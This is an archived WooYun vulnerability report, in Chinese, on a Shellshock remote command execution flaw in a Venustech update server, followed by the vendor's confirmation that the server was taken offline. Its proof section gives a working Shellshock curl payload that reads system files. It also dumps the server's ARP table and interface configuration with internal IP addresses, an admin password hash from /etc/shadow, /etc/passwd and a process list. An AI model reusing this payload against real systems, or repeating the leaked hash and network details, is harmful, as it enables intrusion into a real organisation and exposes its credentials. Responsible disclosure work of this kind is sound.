乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-09: 细节向普通白帽子公开 2016-02-19: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
启明星辰某服务器存在远程命令执行漏洞,服务器有4块网卡,设置了7个C段的内网IP地址
#1 服务器https://updates.venustech.com.cn/#2 漏洞描述Bash shellshock Vul
? (192.168.7.49) at 00:13:20:bf:a3:eb [ether] on eth3.2? (192.168.7.170) at 04:7d:7b:b4:63:f8 [ether] on eth3.2? (192.168.5.67) at 90:b1:1c:6c:95:e4 [ether] on eth3.3? (192.168.7.147) at d0:67:e5:06:d6:22 [ether] on eth3.2? (192.168.99.99) at 00:90:fb:52:60:7d [ether] on eth5? (124.207.17.78) at <incomplete> on eth3.7? (192.168.9.15) at 96:6c:d2:0b:8c:f3 [ether] on eth3.7? (192.168.5.33) at 78:45:c4:05:bc:b4 [ether] on eth3.3? (124.207.17.65) at 00:12:43:78:58:00 [ether] on eth2? (124.207.17.74) at <incomplete> on eth3.7? (192.168.9.109) at 1a:97:a3:0a:c5:8b [ether] on eth3.4? (192.168.7.45) at 00:22:19:04:bf:4e [ether] on eth3.2? (124.207.17.70) at <incomplete> on eth3.8? (192.168.9.10) at 14:fe:b5:d4:25:6f [ether] on eth3.7? (192.168.9.8) at a6:d1:84:f1:a6:a8 [ether] on eth3.7? (124.207.17.76) at <incomplete> on eth3.7? (192.168.5.30) at 18:03:73:37:47:34 [ether] on eth3.3? (124.207.17.77) at a6:d1:84:f1:a6:a8 [ether] on eth3.7? (192.168.7.222) at 38:22:d6:a1:27:dc [ether] on eth3.2? (192.168.5.200) at 78:45:c4:06:0e:7f [ether] on eth3.3? (192.168.7.179) at <incomplete> on eth3.2? (192.168.99.20) at b8:ac:6f:3e:b9:24 [ether] on eth5? (192.168.9.9) at 3e:54:4b:28:95:13 [ether] on eth3.7? (192.168.7.196) at 68:f7:28:b9:c9:97 [ether] on eth3.2? (192.168.99.230) at b0:51:8e:00:dc:e3 [ether] on eth5? (192.168.7.153) at 1c:fa:68:fe:b9:49 [ether] on eth3.2? (192.168.5.85) at 78:a1:06:a0:93:f3 [ether] on eth3.3? (192.168.9.103) at 00:19:d1:5a:5c:91 [ether] on eth3.4
eth2 Link encap:Ethernet HWaddr 00:e0:4c:50:29:28 inet addr:124.207.17.66 Bcast:124.207.17.67 Mask:255.255.255.252 inet6 addr: fe80::2e0:4cff:fe50:2928/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:509587196 errors:0 dropped:150 overruns:0 frame:0 TX packets:447431051 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:477215383114 (444.4 GiB) TX bytes:102776363246 (95.7 GiB) Interrupt:18 Memory:d0200000-d0220000 eth3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2753536727 errors:0 dropped:6301 overruns:0 frame:0 TX packets:2704033675 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2398944004498 (2.1 TiB) TX bytes:2645235946740 (2.4 TiB) Interrupt:19 Memory:d0300000-d0320000 eth5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:2b inet addr:192.168.99.1 Bcast:192.168.99.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:292b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2775236580 errors:0 dropped:1087224 overruns:0 frame:0 TX packets:168683223 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:215766978251 (200.9 GiB) TX bytes:159408116401 (148.4 GiB) Interrupt:17 Memory:d0500000-d0520000 eth3.2 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.7.1 Bcast:192.168.7.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:139999170 errors:0 dropped:0 overruns:0 frame:0 TX packets:178749034 errors:0 dropped:49 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:24650666919 (22.9 GiB) TX bytes:196673483318 (183.1 GiB)eth3.3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:827207656 errors:0 dropped:0 overruns:0 frame:0 TX packets:1659932700 errors:0 dropped:441 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:71391019200 (66.4 GiB) TX bytes:2305127162311 (2.0 TiB)eth3.4 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.9.97 Bcast:192.168.9.127 Mask:255.255.255.224 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:38196894 errors:0 dropped:0 overruns:0 frame:0 TX packets:32701192 errors:0 dropped:546 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:38057682408 (35.4 GiB) TX bytes:21081238644 (19.6 GiB)eth3.5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.8.1 Bcast:192.168.8.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:12150050 errors:0 dropped:0 overruns:0 frame:0 TX packets:15849901 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2263388346 (2.1 GiB) TX bytes:15154916440 (14.1 GiB)eth3.6 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.10.1 Bcast:192.168.10.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:96227890 errors:0 dropped:0 overruns:0 frame:0 TX packets:7267281 errors:0 dropped:39 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:8879882984 (8.2 GiB) TX bytes:7411205232 (6.9 GiB)eth3.7 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.9.1 Bcast:192.168.9.31 Mask:255.255.255.224 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1639751756 errors:0 dropped:0 overruns:0 frame:0 TX packets:809504545 errors:0 dropped:21 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2215151596571 (2.0 TiB) TX bytes:99786721439 (92.9 GiB)eth3.8 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:124.207.17.69 Bcast:124.207.17.71 Mask:255.255.255.252 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3311 errors:0 dropped:0 overruns:0 frame:0 TX packets:29016 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:253892 (247.9 KiB) TX bytes:1218888 (1.1 MiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:86767 errors:0 dropped:0 overruns:0 frame:0 TX packets:86767 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:113560276 (108.2 MiB) TX bytes:113560276 (108.2 MiB)
#3 证明
curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 localhost USAP 192.168.9.125 update.lyxtech.com
admin:$6$3Z7FbI1E$Tdnx3/Yx8cqq1xZzbobGnBo91MAR9RPjnixIjSy2tx0X943RONZLLAlLScvOXj5sLPy3du2EX9iMKKMzYqe60/:16287:0:99999:7:::sshd:!!:13153:0:99999:7:::ldap:!!:13153:0:99999:7:::mysql:!!:13195:0:99999:7:::
cat /etc/passwd admin:x:0:0:root:/usap/boot:/bin/bashdaemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologinwww:x:33:33:www:/usr/local/usap/center/web:/bin/nologinsshd:x:74:74::/var/sshd:/sbin/nologinldap:x:55:55:LDAP User:/var/lib/ldap:/bin/falsemysql:x:500:500::/home/mysql:/sbin/nologin
UID PID PPID C STIME TTY TIME CMDadmin 1 0 0 2015 ? 00:03:17 init [2] admin 2 0 0 2015 ? 00:00:00 [kthreadd]admin 3 2 0 2015 ? 00:00:04 [migration/0]admin 4 2 0 2015 ? 00:48:19 [ksoftirqd/0]admin 5 2 0 2015 ? 00:00:00 [watchdog/0]admin 6 2 0 2015 ? 00:00:09 [migration/1]admin 7 2 11 2015 ? 11-08:44:30 [ksoftirqd/1]admin 8 2 0 2015 ? 00:00:00 [watchdog/1]admin 9 2 0 2015 ? 00:15:58 [events/0]admin 10 2 0 2015 ? 00:07:19 [events/1]admin 11 2 0 2015 ? 00:00:00 [cpuset]admin 12 2 0 2015 ? 00:00:00 [khelper]admin 13 2 0 2015 ? 00:00:00 [netns]admin 14 2 0 2015 ? 00:00:00 [async/mgr]admin 15 2 0 2015 ? 00:00:00 [pm]admin 16 2 0 2015 ? 00:00:10 [sync_supers]admin 17 2 0 2015 ? 00:00:16 [bdi-default]admin 18 2 0 2015 ? 00:00:00 [kintegrityd/0]admin 19 2 0 2015 ? 00:00:00 [kintegrityd/1]admin 20 2 0 2015 ? 00:00:07 [kblockd/0]admin 21 2 0 2015 ? 00:00:10 [kblockd/1]admin 22 2 0 2015 ? 00:00:16 [kacpid]admin 23 2 0 2015 ? 00:00:01 [kacpi_notify]admin 24 2 0 2015 ? 00:00:00 [kacpi_hotplug]admin 25 2 0 2015 ? 00:00:00 [kseriod]admin 28 2 0 2015 ? 01:15:21 [kondemand/0]admin 29 2 0 2015 ? 01:17:09 [kondemand/1]admin 30 2 0 2015 ? 00:00:02 [khungtaskd]admin 31 2 0 2015 ? 00:00:27 [kswapd0]admin 32 2 0 2015 ? 00:00:00 [ksmd]admin 33 2 0 2015 ? 00:00:00 [aio/0]admin 34 2 0 2015 ? 00:00:00 [aio/1]admin 35 2 0 2015 ? 00:00:00 [xfs_mru_cache]admin 36 2 0 2015 ? 00:02:06 [xfslogd/0]admin 37 2 0 2015 ? 00:00:00 [xfslogd/1]admin 38 2 0 2015 ? 00:05:10 [xfsdatad/0]admin 39 2 0 2015 ? 00:00:00 [xfsdatad/1]admin 40 2 0 2015 ? 00:00:00 [xfsconvertd/0]admin 41 2 0 2015 ? 00:00:00 [xfsconvertd/1]admin 42 2 0 2015 ? 00:00:00 [crypto/0]admin 43 2 0 2015 ? 00:00:00 [crypto/1]admin 279 2 0 2015 ? 00:00:00 [ksuspend_usbd]admin 280 2 0 2015 ? 00:00:00 [ata/0]admin 281 2 0 2015 ? 00:00:00 [khubd]admin 282 2 0 2015 ? 00:00:00 [ata/1]admin 283 2 0 2015 ? 00:00:00 [ata_aux]admin 284 2 0 2015 ? 00:00:00 [scsi_eh_0]admin 285 2 0 2015 ? 00:00:00 [scsi_eh_1]admin 290 2 0 2015 ? 00:00:00 [scsi_eh_2]admin 291 2 0 2015 ? 00:00:00 [scsi_eh_3]admin 324 2 0 2015 ? 00:03:33 [flush-8:0]admin 469 2 0 2015 ? 00:00:31 [xfsbufd]admin 470 2 0 2015 ? 00:00:44 [xfsaild]admin 471 2 0 2015 ? 00:00:02 [xfssyncd]admin 473 2 0 2015 ? 00:00:47 [xfsbufd]admin 474 2 0 2015 ? 00:00:49 [xfsaild]admin 475 2 0 2015 ? 00:00:04 [xfssyncd]admin 477 2 0 2015 ? 00:00:00 [loop0]admin 581 1 0 2015 ? 00:00:00 udevd --daemonadmin 635 581 0 2015 ? 00:00:00 udevd --daemonadmin 636 581 0 2015 ? 00:00:00 udevd --daemonadmin 670 2 0 2015 ? 00:00:00 [kconservative/0]admin 671 2 0 2015 ? 00:00:00 [kconservative/1]admin 722 2 0 2015 ? 00:00:00 [USAPTASK]admin 723 2 0 2015 ? 00:00:00 [KUSHSNDMSG]admin 729 2 0 2015 ? 00:00:03 [kClearNet]admin 773 1 0 2015 ? 00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/DB --pid-file=/usr/local/mysql/DB/NSG.pidmysql 1269 773 1 2015 ? 1-07:42:01 /usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/DB --plugin-dir=/usr/local/mysql/lib/plugin --user=mysql --log-error=/usr/local/mysql/DB/NSG.err --pid-file=/usr/local/mysql/DB/NSG.pid --socket=/tmp/mysql.sock --port=3306admin 1453 1 0 2015 ? 00:18:19 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.confadmin 1464 1 0 2015 ? 00:32:10 /usr/bin/rsyslogd -c4admin 1541 1 0 2015 ? 00:03:45 /usr/local/usap/center/bin/billingdadmin 1565 1 0 2015 ? 01:51:21 /usr/local/usap/center/bin/dbbackupdadmin 1567 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ipmacbind_recordadmin 1585 1 0 2015 ? 01:11:57 /usr/local/usap/center/bin/HDMonitoradmin 1594 1 0 2015 ? 00:02:10 /sbin/dhcpd -cf /usr/local/usap/center/config/dhcpd.conf eth3.2 startadmin 1597 1 0 2015 ? 01:05:50 /usr/local/usap/center/bin/bwserverdadmin 2103 1 0 2015 ? 00:16:44 /sbin/sshdadmin 2106 1 0 2015 ? 00:00:15 /usr/bin/cronadmin 2107 1 0 2015 tty1 00:00:00 /sbin/getty 38400 tty1admin 2108 1 0 2015 ttyS0 00:00:00 /sbin/getty -L 9600 ttyS0 vt100admin 19474 20565 3 Jan04 ? 11:58:15 /usr/local/usap/center/bin/ClearNet -Dadmin 19478 2 0 Jan04 ? 00:04:09 [KernelDPI]admin 20565 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ClearNet -Dadmin 21691 1453 0 18:22 ? 00:00:00 /usr/local/usap/center/web/login.cgiadmin 21694 21691 0 18:22 ? 00:00:00 sh -c rm -rf /tmp/tmp_arptableadmin 21695 21694 0 18:22 ? 00:00:00 /bin/ps -ef
更新或者下线
危害等级:高
漏洞Rank:10
确认时间:2016-01-20 17:58
这个是第三方厂商的系统,之前处于测试状态未正式启用。经测试确认问题存在,现已下线跟三方厂商联系修补。 多谢猪猪侠。
暂无
